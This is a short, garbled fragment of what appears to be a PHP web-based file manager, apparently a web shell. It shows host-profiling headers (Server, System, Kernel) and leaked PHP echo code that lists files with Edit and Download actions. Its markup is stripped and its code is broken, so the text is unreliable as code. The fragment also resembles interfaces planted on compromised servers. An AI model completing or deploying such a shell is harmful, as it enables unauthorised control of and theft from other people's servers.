Server:
System:
Kernel:
| Name | Type | Size | Actions | " . ($is_dir ? "$item" : $item) . " | "; echo "" . ($is_dir ? "Directory" : "File") . " | "; echo "" . ($is_dir ? "-" : filesize($full_path) . " bytes") . " | "; echo ""; if (!$is_dir) { echo ""; echo ""; echo "Edit"; echo "Download"; } echo " | "; echo ""; } ?>
|---|